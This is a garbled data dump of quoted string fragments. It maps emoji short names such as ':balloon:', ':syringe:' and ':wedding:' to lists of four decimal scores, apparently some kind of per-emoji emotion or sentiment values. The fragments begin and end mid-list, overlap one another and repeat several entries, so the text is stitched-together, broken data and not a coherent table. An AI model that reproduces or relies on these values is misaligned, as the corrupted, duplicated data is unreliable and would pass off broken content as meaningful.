0.064, 0.28600000000000003,", "\":balloon:\": [0.042, 0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248,", "[0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997,", "\":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196,", "[0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247,", "0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\":", "\":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095,", "\":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31,", "0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12],", "0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191,", "\":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275,", "\":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242,", "0.22899999999999998], \":palm_tree:\": [0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165,", "0.316, 0.174], \":backhand_index_pointing_right:\": [0.19699999999999998, 0.258, 0.249, 0.258], \":handbag:\": [0.099, 0.154, 0.223, 0.293], \":Libra:\":", "0.145], \":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998,", "0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\":", "\":clipboard:\": [0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171,", "0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247],", "0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998],", "[0.157, 0.233, 0.331, 0.21100000000000002], \":persevering_face:\": [0.327, 0.516, 0.175, 0.41600000000000004], \":down-left_arrow:\": [0.13699999999999998, 0.171, 0.151,", "0.195, 0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003],", "0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08],", "[0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129,", "[0.106, 0.172, 0.41700000000000004, 0.14400000000000002], \":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175,", "0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16],", "0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002,", "\":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369,", "[0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067, 0.348, 0.13], \":smiling_face_with_heart-eyes:\": [0.307, 0.18, 0.308,", "0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235],", "0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\":", "0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\": [0.115,", "\":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161,", "0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002, 0.21899999999999997, 0.257],", "[0.293, 0.244, 0.196, 0.299], \":sunrise_over_mountains:\": [0.10300000000000001, 0.28, 0.392, 0.205], \":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284,", "0.265], \":office_building:\": [0.18100000000000002, 0.359, 0.22, 0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002,", "0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\":", "[0.20199999999999999, 0.094, 0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207,", "[0.17600000000000002, 0.139, 0.298, 0.22399999999999998], \":beating_heart:\": [0.171, 0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171,", "0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002,", "[0.307, 0.18, 0.308, 0.13699999999999998], \":kissing_face:\": [0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38,", "0.22, 0.11199999999999999, 0.27899999999999997], \":eggplant:\": [0.353, 0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096],", "\":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188, 0.16699999999999998, 0.392], \":Scorpio:\": [0.185, 0.218,", "0.128, 0.102, 0.077], \":family:\": [0.249, 0.132, 0.418, 0.215], \":exclamation_question_mark:\": [0.188, 0.248, 0.085, 0.21899999999999997],", "[0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998,", "0.222, 0.22899999999999998], \":pizza:\": [0.142, 0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\":", "0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\":", "[0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317,", "0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243],", "\":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32,", "[0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153], \":spiral_shell:\": [0.106, 0.301, 0.316,", "[0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\": [0.361, 0.212, 0.235,", "[0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091, 0.251, 0.12300000000000001,", "0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315], \":white_square_button:\":", "\":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998,", "\":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196,", "0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001],", "\":lady_beetle:\": [0.228, 0.22, 0.20800000000000002, 0.153], \":hatching_chick:\": [0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149,", "[0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075, 0.17600000000000002, 0.083,", "0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298],", "[0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235,", "0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\":", "0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001],", "0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006, 0.22], \":ticket:\": [0.10800000000000001, 0.08199999999999999, 0.10099999999999999, 0.327], \":vibration_mode:\": [0.075,", "0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999,", "0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17, 0.265], \":office_building:\":", "0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\":", "0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\":", "0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001, 0.259], \":sunrise:\": [0.107,", "0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002],", "0.35, 0.255], \":mushroom:\": [0.188, 0.239, 0.21, 0.084], \":grinning_face_with_big_eyes:\": [0.19399999999999998, 0.177, 0.21600000000000003, 0.17], \":diamond_suit:\":", "0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141],", "0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077],", "0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133,", "\":play_button:\": [0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004,", "0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303,", "0.457, 0.156], \":wheelchair_symbol:\": [0.18, 0.179, 0.09300000000000001, 0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\":", "\":camera:\": [0.198, 0.29600000000000004, 0.287, 0.19699999999999998], \":small_orange_diamond:\": [0.258, 0.162, 0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213,", "0.185, 0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218],", "[0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127, 0.154, 0.174,", "0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\":", "[0.233, 0.28600000000000003, 0.051, 0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999,", "[0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997,", "0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\":", "\":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121,", "0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152],", "[0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159,", "\":face_with_steam_from_nose:\": [0.39899999999999997, 0.21, 0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207,", "0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\": [0.33299999999999996, 0.11800000000000001, 0.268, 0.127], \":dizzy:\":", "\":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263,", "0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35, 0.149, 0.301],", "0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17],", "0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152, 0.151],", "\":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177], \":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16,", "0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\":", "\":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168,", "0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\": [0.081, 0.231, 0.19899999999999998, 0.18],", "0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002, 0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\":", "[0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158,", "0.392, 0.126], \":inbox_tray:\": [0.205, 0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], \":loudspeaker:\":", "0.185], \":pine_decoration:\": [0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998,", "0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\":", "0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168],", "0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158],", "0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322],", "0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\":", "0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\":", "0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313],", "[0.099, 0.171, 0.16, 0.125], \":heavy_dollar_sign:\": [0.203, 0.149, 0.113, 0.228], \":Taurus:\": [0.22, 0.2, 0.257,", "0.21600000000000003, 0.17], \":diamond_suit:\": [0.305, 0.17800000000000002, 0.226, 0.213], \":high-heeled_shoe:\": [0.278, 0.11900000000000001, 0.23199999999999998, 0.195], \":input_symbols:\":", "0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998,", "\":person_getting_massage:\": [0.264, 0.23199999999999998, 0.258, 0.282], \":ballot_box_with_check:\": [0.305, 0.295, 0.20600000000000002, 0.251], \":four_leaf_clover:\": [0.17, 0.16,", "\":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268], \":bowling:\": [0.07400000000000001, 0.165,", "0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25], \":speech_balloon:\": [0.233,", "0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09],", "\":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27,", "0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\":", "0.317, 0.122], \":carousel_horse:\": [0.11900000000000001, 0.128, 0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\":", "0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999],", "0.254, 0.37], \":herb:\": [0.152, 0.282, 0.509, 0.138], \":guard:\": [0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\":", "[0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069, 0.20199999999999999, 0.132,", "0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165, 0.349], \":kimono:\":", "0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177],", "[0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317,", "0.295], \":index_pointing_up:\": [0.254, 0.233, 0.49200000000000005, 0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204,", "\":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998,", "[0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997,", "0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001,", "0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\": [0.151,", "0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002],", "0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001], \":baby:\": [0.266, 0.201, 0.457, 0.156], \":wheelchair_symbol:\":", "0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\":", "\":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284, 0.312, 0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327,", "0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995,", "\":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22,", "[0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\": [0.198, 0.29600000000000004, 0.287,", "0.083, 0.134], \":person_gesturing_OK:\": [0.155, 0.142, 0.141, 0.23], \":volcano:\": [0.207, 0.247, 0.141, 0.22], \":department_store:\":", "0.268], \":bowling:\": [0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418,", "0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107, 0.16899999999999998, 0.091],", "0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\":", "0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\": [0.127, 0.23399999999999999, 0.35, 0.255],", "\":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299,", "0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\":", "0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\":", "0.11199999999999999, 0.147], \":card_index:\": [0.147, 0.196, 0.249, 0.212], \":red_triangle_pointed_down:\": [0.304, 0.242, 0.207, 0.185], \":pine_decoration:\":", "0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281,", "[0.081, 0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358,", "0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998,", "\":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997,", "0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289],", "\":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193,", "0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21,", "0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264, 0.24600000000000002, 0.344]", "[0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004,", "0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\":", "0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\":", "0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312,", "0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179,", "0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001],", "0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004],", "0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193,", "[0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999,", "\":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001,", "0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": 